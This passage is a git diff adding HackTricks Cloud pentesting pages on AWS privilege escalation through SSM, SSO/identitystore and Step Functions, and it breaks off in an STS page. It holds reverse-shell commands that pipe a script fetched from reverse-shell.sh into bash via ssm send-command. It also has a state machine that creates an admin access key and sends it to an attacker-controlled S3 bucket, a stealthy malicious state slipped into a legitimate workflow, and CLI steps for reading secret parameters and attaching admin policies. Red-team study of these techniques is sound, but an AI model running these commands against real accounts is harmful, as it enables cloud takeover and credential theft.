+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md
new file mode 100644
index 0000000000..f496e89a32
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md
@@ -0,0 +1,159 @@
+# AWS - SSM Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## SSM
+
+For more info about SSM check:
+
+{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %}
+[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/)
+{% endcontent-ref %}
+
+### `ssm:SendCommand`
+
+An attacker with the permission **`ssm:SendCommand`** can **execute commands in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it.
+
+```bash
+# Check for configured instances
+aws ssm describe-instance-information
+aws ssm describe-sessions --state Active
+
+# Send rev shell command
+aws ssm send-command --instance-ids "$INSTANCE_ID" \
+   --document-name "AWS-RunShellScript" --output text \
+   --parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"
+```
+
+In case you are using this technique to escalate privileges inside an already compromised EC2 instance, you could just capture the rev shell locally with:
+
+```bash
+# If you are in the machine you can capture the reverseshel inside of it
+nc -lvnp 4444 #Inside the EC2 instance
+aws ssm send-command --instance-ids "$INSTANCE_ID" \
+   --document-name "AWS-RunShellScript" --output text \
+   --parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"
+```
+
+**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.
+
+### `ssm:StartSession`
+
+An attacker with the permission **`ssm:StartSession`** can **start a SSH like session in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it.
+
+```bash
+# Check for configured instances
+aws ssm describe-instance-information
+aws ssm describe-sessions --state Active
+
+# Send rev shell command
+aws ssm start-session --target "$INSTANCE_ID"
+```
+
+{% hint style="danger" %}
+In order to start a session you need the **SessionManagerPlugin** installed: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html)
+{% endhint %}
+
+**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.
+
+#### Privesc to ECS
+
+When **ECS tasks** run with **`ExecuteCommand` enabled** users with enough permissions can use `ecs execute-command` to **execute a command** inside the container.\
+According to [**the documentation**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) this is done by creating a secure channel between the device you use to initiate the “_exec_“ command and the target container with SSM Session Manager. (SSM Session Manager Plugin necesary for this to work)\
+Therefore, users with `ssm:StartSession` will be able to **get a shell inside ECS tasks** with that option enabled just running:
+
+```bash
+aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"
+```
+
+![](<../../../.gitbook/assets/image (185).png>)
+
+**Potential Impact:** Direct privesc to the `ECS`IAM roles attached to running tasks with `ExecuteCommand` enabled.
+
+### `ssm:ResumeSession`
+
+An attacker with the permission **`ssm:ResumeSession`** can re-**start a SSH like session in instances** running the Amazon SSM Agent with a **disconnected** SSM session state and **compromise the IAM Role** running inside of it.
+
+```bash
+# Check for configured instances
+aws ssm describe-sessions
+
+# Get resume data (you will probably need to do something else with this info to connect)
+aws ssm resume-session \
+    --session-id Mary-Major-07a16060613c408b5
+```
+
+**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running and disconected sessions.
+
+### `ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`)
+
+An attacker with the mentioned permissions is going to be able to list the **SSM parameters** and **read them in clear-text**. In these parameters you can frequently **find sensitive information** such as SSH keys or API keys.
+
+```bash
+aws ssm describe-parameters
+# Suppose that you found a parameter called "id_rsa"
+aws ssm get-parameters --names id_rsa --with-decryption
+aws ssm get-parameter --name id_rsa --with-decryption
+```
+
+**Potential Impact:** Find sensitive information inside the parameters.
+
+### `ssm:ListCommands`
+
+An attacker with this permission can list all the **commands** sent and hopefully find **sensitive information** on them.
+
+```
+aws ssm list-commands
+```
+
+**Potential Impact:** Find sensitive information inside the command lines.
+
+### `ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`)
+
+An attacker with these permissions can list all the **commands** sent and **read the output** generated hopefully finding **sensitive information** on it.
+
+```bash
+# You can use any of both options to get the command-id and instance id
+aws ssm list-commands
+aws ssm list-command-invocations
+
+aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>
+```
+
+**Potential Impact:** Find sensitive information inside the output of the command lines.
+
+### Codebuild
+
+You can also use SSM to get inside a codebuild project being built:
+
+{% content-ref url="aws-codebuild-privesc.md" %}
+[aws-codebuild-privesc.md](aws-codebuild-privesc.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md
new file mode 100644
index 0000000000..cef6c3dc84
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md
@@ -0,0 +1,180 @@
+# AWS - SSO & identitystore Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## AWS Identity Center / AWS SSO
+
+For more information about AWS Identity Center / AWS SSO check:
+
+{% content-ref url="../aws-services/aws-iam-enum.md" %}
+[aws-iam-enum.md](../aws-services/aws-iam-enum.md)
+{% endcontent-ref %}
+
+{% hint style="warning" %}
+Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\
+Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\
+[Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html)
+{% endhint %}
+
+### ~~Reset Password~~
+
+An easy way to escalate privileges in cases like this one would be to have a permission that allows to reset users passwords. Unfortunately it's only possible to send an email to the user to reset his password, so you would need access to the users email.
+
+### `identitystore:CreateGroupMembership`
+
+With this permission it's possible to set a user inside a group so he will inherit all the permissions the group has.
+
+{% code overflow="wrap" %}
+```bash
+aws identitystore create-group-membership --identity-store-id <tore-id> --group-id <group-id> --member-id UserId=<user-id>
+```
+{% endcode %}
+
+### `sso:PutInlinePolicyToPermissionSet`, `sso:ProvisionPermissionSet`
+
+An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control
+
+{% code overflow="wrap" %}
+```bash
+# Set an inline policy with admin privileges
+aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.yaml
+
+# Content of /tmp/policy.yaml
+{
+	"Version": "2012-10-17",
+	"Statement": [
+		{
+			"Sid": "Statement1",
+			"Effect": "Allow",
+			"Action": ["*"],
+			"Resource": ["*"]
+		}
+	]
+}
+
+# Update the provisioning so the new policy is created in the account
+aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
+```
+{% endcode %}
+
+### `sso:AttachManagedPolicyToPermissionSet`, `sso:ProvisionPermissionSet`
+
+An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control
+
+{% code overflow="wrap" %}
+```bash
+# Set AdministratorAccess policy to the permission set
+aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"
+
+# Update the provisioning so the new policy is created in the account
+aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
+```
+{% endcode %}
+
+### `sso:AttachCustomerManagedPolicyReferenceToPermissionSet`, `sso:ProvisionPermissionSet`
+
+An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control.
+
+{% hint style="warning" %}
+To abuse these permissions in this case you need to know the **name of a customer managed policy that is inside ALL the accounts** that are going to be affected.
+{% endhint %}
+
+{% code overflow="wrap" %}
+```bash
+# Set AdministratorAccess policy to the permission set
+aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>
+
+# Update the provisioning so the new policy is created in the account
+aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
+```
+{% endcode %}
+
+### `sso:CreateAccountAssignment`
+
+An attacker with this permission could give a Permission Set to a user under his control to an account.
+
+{% code overflow="wrap" %}
+```bash
+aws sso-admin create-account-assignment --instance-arn <instance-arn> --target-id <account_num> --target-type AWS_ACCOUNT --permission-set-arn <permission_set_arn> --principal-type USER --principal-id <principal_id>
+```
+{% endcode %}
+
+### `sso:GetRoleCredentials`
+
+Returns the STS short-term credentials for a given role name that is assigned to the user.
+
+{% code overflow="wrap" %}
+```
+aws sso get-role-credentials --role-name <value> --account-id <value> --access-token <value>
+```
+{% endcode %}
+
+However, you need an access token that I'm not sure how to get (TODO).
+
+### `sso:DetachManagedPolicyFromPermissionSet`
+
+An attacker with this permission can remove the association between an AWS managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**.
+
+{% code overflow="wrap" %}
+```bash
+aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>
+```
+{% endcode %}
+
+### `sso:DetachCustomerManagedPolicyReferenceFromPermissionSet`
+
+An attacker with this permission can remove the association between a Customer managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**.
+
+{% code overflow="wrap" %}
+```bash
+aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>
+```
+{% endcode %}
+
+### `sso:DeleteInlinePolicyFromPermissionSet`
+
+An attacker with this permission can action remove the permissions from an inline policy from the permission set. It is possible to grant **more privileges via detaching an inline policy (deny policy)**.
+
+{% code overflow="wrap" %}
+```bash
+aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>
+```
+{% endcode %}
+
+### `sso:DeletePermissionBoundaryFromPermissionSet`
+
+An attacker with this permission can remove the Permission Boundary from the permission set. It is possible to grant **more privileges by removing the restrictions on the Permission Set** given from the Permission Boundary.
+
+{% code overflow="wrap" %}
+```bash
+aws sso-admin   delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md
new file mode 100644
index 0000000000..4084a29726
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md
@@ -0,0 +1,291 @@
+# AWS - Step Functions Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Step Functions
+
+For more information about this AWS service, check:
+
+{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %}
+[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md)
+{% endcontent-ref %}
+
+### Task Resources
+
+These privilege escalation techniques are going to require to use some AWS step function resources in order to perform the desired privilege escalation actions.
+
+In order to check all the possible actions, you could go to your own AWS account select the action you would like to use and see the parameters it's using, like in:
+
+<figure><img src="../../../.gitbook/assets/telegram-cloud-photo-size-4-5920521132757336440-y.jpg" alt=""><figcaption></figcaption></figure>
+
+Or you could also go to the API AWS documentation and check each action docs:
+
+* [**AddUserToGroup**](https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html)
+* [**GetSecretValue**](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html)
+
+### `states:TestState` & `iam:PassRole`
+
+An attacker with the **`states:TestState`** & **`iam:PassRole`** permissions can test any state and pass any IAM role to it without creating or updating an existing state machine, enabling unauthorized access to other AWS services with the roles' permissions. potentially. Combined, these permissions can lead to extensive unauthorized actions, from manipulating workflows to alter data to data breaches, resource manipulation, and privilege escalation.
+
+{% code overflow="wrap" %}
+```bash
+aws states test-state --definition <value> --role-arn <value> [--input <value>] [--inspection-level <value>] [--reveal-secrets | --no-reveal-secrets]
+```
+{% endcode %}
+
+The following examples show how to test an state that creates an access key for the **`admin`** user leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state to perform the **`iam:CreateAccessKey`** action:
+
+* **stateDefinition.json**:
+
+```json
+{
+  "Type": "Task",
+  "Parameters": {
+    "UserName": "admin"
+  },
+  "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
+  "End": true
+}
+```
+
+* **Command** executed to perform the privesc:
+
+{% code overflow="wrap" %}
+```bash
+aws stepfunctions test-state --definition file://stateDefinition.json --role-arn arn:aws:iam::<account-id>:role/PermissiveRole
+
+{
+  "output": "{
+	  \"AccessKey\":{
+		  \"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\",
+		  \"CreateDate\":\"2024-07-09T16:59:11Z\",
+		  \"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\",
+		  \"Status\":\"Active\",
+		  \"UserName\":\"admin\"
+	  }
+  }",
+	"status": "SUCCEEDED"
+}
+```
+{% endcode %}
+
+**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
+
+### `states:CreateStateMachine` & `iam:PassRole` & (`states:StartExecution` | `states:StartSyncExecution`)
+
+An attacker with the **`states:CreateStateMachine`**& **`iam:PassRole`** would be able to create an state machine and provide to it any IAM role, enabling unauthorized access to other AWS services with the roles' permissions. In contrast with the previous privesc technique (**`states:TestState`** & **`iam:PassRole`**), this one does not execute by itself, you will also need to have the **`states:StartExecution`** or **`states:StartSyncExecution`** permissions (**`states:StartSyncExecution`** is **not available for standard workflows**, **just to express state machines**) in order to start and execution over the state machine.
+
+{% code overflow="wrap" %}
+```bash
+# Create a state machine
+aws states create-state-machine --name <value> --definition <value> --role-arn <value> [--type <STANDARD | EXPRESS>] [--logging-configuration <value>]\
+[--tracing-configuration <enabled=true|false>] [--publish | --no-publish] [--version-description <value>]
+
+# Start a state machine execution
+aws states start-execution --state-machine-arn <value> [--name <value>] [--input <value>] [--trace-header <value>]
+
+# Start a Synchronous Express state machine execution
+aws states start-sync-execution --state-machine-arn <value> [--name <value>] [--input <value>] [--trace-header <value>]
+```
+{% endcode %}
+
+The following examples show how to create an state machine that creates an access key for the **`admin`** user and exfiltrates this access key to an attacker-controlled S3 bucket, leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state machine to perform the **`iam:CreateAccessKey`** & **`s3:putObject`** actions.
+
+* **stateMachineDefinition.json**:
+
+```json
+{
+  "Comment": "Malicious state machine to create IAM access key and upload to S3",
+  "StartAt": "CreateAccessKey",
+  "States": {
+    "CreateAccessKey": {
+      "Type": "Task",
+      "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
+      "Parameters": {
+        "UserName": "admin"
+      },
+      "ResultPath": "$.AccessKeyResult",
+      "Next": "PrepareS3PutObject"
+    },
+    "PrepareS3PutObject": {
+      "Type": "Pass",
+      "Parameters": {
+        "Body.$": "$.AccessKeyResult.AccessKey",
+        "Bucket": "attacker-controlled-S3-bucket",
+        "Key": "AccessKey.json"
+      },
+      "ResultPath": "$.S3PutObjectParams",
+      "Next": "PutObject"
+    },
+    "PutObject": {
+      "Type": "Task",
+      "Resource": "arn:aws:states:::aws-sdk:s3:putObject",
+      "Parameters": {
+        "Body.$": "$.S3PutObjectParams.Body",
+        "Bucket.$": "$.S3PutObjectParams.Bucket",
+        "Key.$": "$.S3PutObjectParams.Key"
+      },
+      "End": true
+    }
+  }
+}
+```
+
+* **Command** executed to **create the state machine**:
+
+{% code overflow="wrap" %}
+```bash
+aws stepfunctions create-state-machine --name MaliciousStateMachine --definition file://stateMachineDefinition.json --role-arn arn:aws:iam::123456789012:role/PermissiveRole
+{
+  "stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine",
+  "creationDate": "2024-07-09T20:29:35.381000+02:00"
+}
+```
+{% endcode %}
+
+* **Command** executed to **start an execution** of the previously created state machine:
+
+{% code overflow="wrap" %}
+```json
+aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine
+{
+    "executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
+    "startDate": "2024-07-09T20:33:35.466000+02:00"
+}
+```
+{% endcode %}
+
+{% hint style="warning" %}
+The attacker-controlled S3 bucket should have permissions to accept an s3:PutObject action from the victim account.
+{% endhint %}
+
+**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
+
+### `states:UpdateStateMachine` & (not always required) `iam:PassRole`
+
+An attacker with the **`states:UpdateStateMachine`** permission would be able to modify the definition of an state machine, being able to add extra stealthy states that could end in a privilege escalation. This way, when a legitimate user starts an execution of the state machine, this new malicious stealth state will be executed and the privilege escalation will be successful.
+
+Depending on how permissive is the IAM Role associated to the state machine is, an attacker would face 2 situations:
+
+1. **Permissive IAM Role**: If the IAM Role associated to the state machine is already permissive (it has for example the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached), then the **`iam:PassRole`** permission would not be required in order to escalate privileges since it would not be necessary to also update the IAM Role, with the state machine definition is enough.
+2. **Not permissive IAM Role**: In contrast with the previous case, here an attacker would also require the **`iam:PassRole`** permission since it would be necessary to associate a permissive IAM Role to the state machine in addition to modify the state machine definition.
+
+{% code overflow="wrap" %}
+```bash
+aws states update-state-machine --state-machine-arn <value> [--definition <value>] [--role-arn <value>] [--logging-configuration <value>] \
+[--tracing-configuration <enabled=true|false>] [--publish | --no-publish] [--version-description <value>]
+```
+{% endcode %}
+
+The following examples show how to update a legit state machine that just invokes a HelloWorld Lambda function, in order to add an extra state that adds the user **`unprivilegedUser`** to the **`administrator`** IAM Group. This way, when a legitimate user starts an execution of the updated state machine, this new malicious stealth state will be executed and the privilege escalation will be successful.
+
+{% hint style="warning" %}
+If the state machine does not have a permissive IAM Role associated, it would also be required the **`iam:PassRole`** permission to update the IAM Role in order to associate a permissive IAM Role (for example one with the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached).
+{% endhint %}
+
+{% tabs %}
+{% tab title="Legit State Machine" %}
+```json
+{
+  "Comment": "Hello world from Lambda state machine",
+  "StartAt": "Start PassState",
+  "States": {
+    "Start PassState": {
+      "Type": "Pass",
+      "Next": "LambdaInvoke"
+    },
+    "LambdaInvoke": {
+      "Type": "Task",
+      "Resource": "arn:aws:states:::lambda:invoke",
+      "Parameters": {
+        "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
+      },
+      "Next": "End PassState"
+    },
+    "End PassState": {
+      "Type": "Pass",
+      "End": true
+    }
+  }
+}
+```
+{% endtab %}
+
+{% tab title="Malicious Updated State Machine" %}
+```json
+{
+  "Comment": "Hello world from Lambda state machine",
+  "StartAt": "Start PassState",
+  "States": {
+    "Start PassState": {
+      "Type": "Pass",
+      "Next": "LambdaInvoke"
+    },
+    "LambdaInvoke": {
+      "Type": "Task",
+      "Resource": "arn:aws:states:::lambda:invoke",
+      "Parameters": {
+        "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
+      },
+      "Next": "AddUserToGroup"
+    },
+    "AddUserToGroup": {
+      "Type": "Task",
+      "Parameters": {
+        "GroupName": "administrator",
+        "UserName": "unprivilegedUser"
+      },
+      "Resource": "arn:aws:states:::aws-sdk:iam:addUserToGroup",
+      "Next": "End PassState"
+    },
+    "End PassState": {
+      "Type": "Pass",
+      "End": true
+    }
+  }
+}
+```
+{% endtab %}
+{% endtabs %}
+
+* **Command** executed to **update** **the legit state machine**:
+
+{% code overflow="wrap" %}
+```bash
+aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:HelloWorldLambda --definition file://StateMachineUpdate.json
+{
+    "updateDate": "2024-07-10T20:07:10.294000+02:00",
+    "revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+}
+```
+{% endcode %}
+
+**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md
new file mode 100644
index 0000000000..1162ac6fef
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md
@@ -0,0 +1,153 @@
+# AWS - STS Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
